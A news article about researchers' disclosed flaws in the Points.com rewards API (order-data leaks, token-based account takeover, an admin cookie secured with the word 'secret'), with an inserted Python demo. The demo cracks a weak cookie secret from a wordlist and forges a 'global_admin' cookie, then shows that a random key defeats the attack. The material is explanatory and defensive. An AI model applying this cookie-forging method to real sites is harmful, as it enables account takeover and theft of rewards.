Hackers Have Scored Unlimited Airline Miles, Targeting One Platform

A group of security researchers discovered vulnerabilities in the Points.com API that could have been exploited to expose customer data.


TRAVEL REWARDS PROGRAMS, such as those run by hotels and airlines, advertise the unique benefits of joining their club rather than a competitor's. Behind the scenes, however, several of these programs, including Delta SkyMiles, United MileagePlus, Hilton Honors, and Marriott Bonvoy, share the same digital infrastructure. The backend is provided by the company Points, which offers a range of services including a comprehensive application programming interface (API).

In a new finding, a group of security researchers discovered vulnerabilities in the Points.com API that could have been exploited to expose customer data, steal customers' "loyalty currency" (such as miles), or take over Points global administration accounts and thereby gain control over an entire rewards program.

About the Vulnerabilities

The researchers discovered a vulnerability that let them pivot between internal sections of the Points API infrastructure and then query it for rewards-program customer orders. The system held 22 million order records containing data such as customer rewards account numbers, addresses, phone numbers, email addresses, and partial credit card numbers. An attacker could not simply dump the entire data store at once, because Points.com limited how many results the system would return per request. However, the researchers point out that the flaw would still have allowed a threat actor to look up specific people of interest or to drain data from the system gradually over time.

Another bug was an API configuration issue that could allow a threat actor to obtain an account authorization token for a user knowing only that user's last name and rewards number. Both pieces of information could have been obtained from earlier breaches, or by exploiting the first vulnerability. With such a token, attackers could take control of customer accounts and drain them by transferring miles or other reward points to themselves.

The researchers also noted that these two vulnerabilities resembled other bugs discovered earlier, one affecting Virgin Red and the other United MileagePlus. Those bugs too were patched by Points.com.

Most importantly, the researchers discovered a flaw in the Points.com global administration website: the encrypted cookie issued to each user was protected with an easily guessable secret, the word "secret" itself. By guessing this value, the researchers could decrypt their own cookie, grant themselves global administrator privileges for the site, and re-encrypt the cookie. That gave them essentially god-like access to any rewards program running on Points, including the ability to credit accounts with unlimited miles or other perks.
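The following is an added illustration, not Points.com's code or the researchers' tooling. It models the class of flaw described above with a toy HMAC-signed cookie standing in for the encrypted one (the attack pattern is identical either way): a single captured cookie is enough to test each candidate secret offline, and once the secret is recovered the attacker rewrites the privilege field and re-protects the cookie so the server accepts it. The cookie layout, the claim names (`role`, `global_admin`), and the wordlist are assumptions for illustration. The hardened variant at the end shows why a randomly generated key defeats the same attack.

```python
"""Forging a cookie whose protection rests on a guessable secret (added example)."""
import base64
import binascii
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Toy scheme (assumed, not Points.com's): base64url(JSON claims) + "." + base64url(HMAC-SHA256).
# The server trusts any claims whose MAC verifies under its secret.


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64d(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue_cookie(claims: dict, secret: str) -> str:
    """Server side: serialise the claims and append a MAC under `secret`."""
    payload = json.dumps(claims, sort_keys=True, separators=(",", ":")).encode()
    mac = hmac.new(secret.encode(), payload, hashlib.sha256).digest()
    return f"{_b64e(payload)}.{_b64e(mac)}"


def verify_cookie(cookie: str, secret: str) -> Optional[dict]:
    """Server side: return the claims if the MAC checks out, else None."""
    try:
        p, m = cookie.split(".", 1)
        payload, mac = _b64d(p), _b64d(m)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(secret.encode(), payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        return None
    return json.loads(payload)


# Attacker side. Constructed wordlist of common weak secrets, including the one
# the article reports ("secret").
WORDLIST = ["password", "changeme", "admin", "secret", "letmein"]


def recover_secret(cookie: str, wordlist) -> Optional[str]:
    """Offline dictionary attack: each guess is checked against the captured cookie locally."""
    for guess in wordlist:
        if verify_cookie(cookie, guess) is not None:
            return guess
    return None


def escalate(cookie: str, wordlist) -> Optional[str]:
    """Recover the secret, rewrite the privilege claim, and re-sign the cookie."""
    secret = recover_secret(cookie, wordlist)
    if secret is None:
        return None
    claims = verify_cookie(cookie, secret)
    claims["role"] = "global_admin"  # assumed claim name and admin value
    return issue_cookie(claims, secret)


def demo():
    """Weak secret: the forged cookie is accepted. Strong secret: the attack fails."""
    weak_secret = "secret"
    user_cookie = issue_cookie({"user": "alice", "role": "member"}, weak_secret)
    forged = escalate(user_cookie, WORDLIST)
    accepted_claims = verify_cookie(forged, weak_secret)

    # Hardened: a 256-bit random key cannot be guessed from a wordlist.
    strong_secret = secrets.token_hex(32)
    safe_cookie = issue_cookie({"user": "alice", "role": "member"}, strong_secret)
    forged_safe = escalate(safe_cookie, WORDLIST)
    return accepted_claims, forged_safe


if __name__ == "__main__":
    claims, failed = demo()
    print("forged cookie accepted with role:", claims["role"])
    print("attack against random key succeeded:", failed is not None)
```

The check that matters operationally is the one `demo()` performs on the hardened path: a secret drawn from `secrets.token_hex(32)` (or the equivalent in the framework's configuration) makes the offline guessing step infeasible, whereas no amount of rate limiting on the website helps, because the attacker never has to send a guess to the server until the forged cookie is ready.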

The researchers also confirmed that the fixes Points deployed work as intended, and said that Points was prompt and cooperative in addressing the disclosures.


Labels: Airline, Airline rewards, API Bug, Hackers, loyalty points, Travel reward programs, Vulnerabilities and Exploits